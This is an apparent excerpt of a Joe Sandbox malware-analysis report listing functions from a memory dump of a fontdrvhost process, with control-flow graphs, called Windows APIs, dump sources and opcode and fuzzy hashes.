                                                                                                                                                                                                                                                                    • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                    • Instruction ID: 83ed1252368dd4a6c2f986efe44204525e5949b758f09a8e4f1288568da9045f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941E070208B488FDB48DF2CC8897D97B91EB56320F04439EE96ACB2D7DA34C9458795
                                                                                                                                                                                                                                                                    Function 00000113700115C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 118 113700115c0-113700115f2 119 113700115f4-113700115f7 118->119 120 113700115f9-113700115fb 118->120 121 1137001161f-1137001166d NtAcceptConnectPort 119->121 122 1137001160b-1137001160d 120->122 123 113700115fd-11370011609 120->123 124 1137001161d 122->124 125 1137001160f-1137001161b 122->125 123->121 124->121 125->121
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000011370011E3A), ref: 0000011370011654
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2972140329.0000011370010000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011370010000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_11370010000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                    • Instruction ID: a20972521ed6df6fc4e0445b7d33fd54734f526179779e96769dba40470c8323
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A216DB1508B088FDB59DF18C489AEAF7E1FBA9305F040A2EE55AC7360DB31D585CB42
                                                                                                                                                                                                                                                                    Function 0000011370011870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 95 11370011870-113700118a0 call 113700108a4 * 2 100 11370011954-1137001195b 95->100 101 113700118a6-113700118a9 95->101 101->100 102 113700118af-113700118b9 101->102 102->100 103 113700118bf-113700118c4 102->103 103->100 104 113700118ca-113700118d7 103->104 104->100 105 113700118d9-113700118e1 104->105 105->100 106 113700118e3-113700118ee 105->106 106->100 107 113700118f0-113700118f7 106->107 107->100 108 113700118f9-113700118fc 107->108 108->100 109 113700118fe-11370011906 108->109 109->100 110 11370011908-1137001190b 109->110 110->100 111 1137001190d-11370011916 110->111 111->100 112 11370011918-1137001191c 111->112 112->100 113 1137001191e-1137001192e 112->113 113->100 115 11370011930-11370011947 GetProcessMitigationPolicy 113->115 115->100 116 11370011949-1137001194e 115->116 116->100 117 11370011950-11370011951 116->117 117->100
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2972140329.0000011370010000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011370010000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_11370010000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                    • Instruction ID: 885b96b3cddba5cb5c51406ac0a9d82209e95757cb1d51146a81870b42f48da8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5319374300A074AEBEF9768C4A47F9F2D2EB95320F1401ABC275D72D9EE75CA49C640

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 0000011370010511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000027.00000002.2972140329.0000011370010000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011370010000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_39_2_11370010000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                    • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F